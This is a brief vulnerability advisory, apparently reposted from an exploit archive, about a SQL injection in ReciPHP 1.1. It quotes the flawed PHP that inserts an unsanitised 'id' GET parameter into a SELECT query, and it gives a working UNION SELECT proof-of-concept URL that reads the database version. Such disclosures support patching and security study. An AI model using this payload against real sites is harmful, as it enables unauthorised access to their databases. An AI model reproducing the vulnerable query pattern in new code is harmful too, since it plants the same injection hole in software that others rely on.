\#'#/
(-.-)
--------------------oOO---(_)---OOo----------------------
| ReciPHP 1.1 SQL Injection Vulnerability |
---------------------------------------------------------
作者: cr4wl3r <cr4wl3r[!]linuxmail.org> HdhCmsTest2cto测试数据 http://0xuht.org
下载 地址: http://sourceforge.net/projects/reciphp/files/
Remote: yes
测试平台: Ubuntu
[!] Reference: http://0xuht.org/Exploit/reciphp.txt
[!]缺陷代码 [showrecipe.inc.php] :
<?php include 'config.php'; ?>
<div id="main">
<div id='preview'><?php
$recipeid = $_GET['id'];
$query = "SELECT title,poster,shortdesc,ingredients,directions from recipes where recipeid = $recipeid";
$result = mysql_query($query) or die('Could not find recipe');
[!] PoC (Piye om Carane):
[Reci PHP ]/index.php?content=showrecipe&id=-3 union select version(),2,3,4,5--
[!] 测试:
http://0xuht.org/demo/reciphp.png
[!]致谢: packetstormsecurity
// Gorontalo [2012-11-14]
查看更多关于ReciPHP 1.1 SQL注射及修复 - 网站安全 - 自学php的详细内容...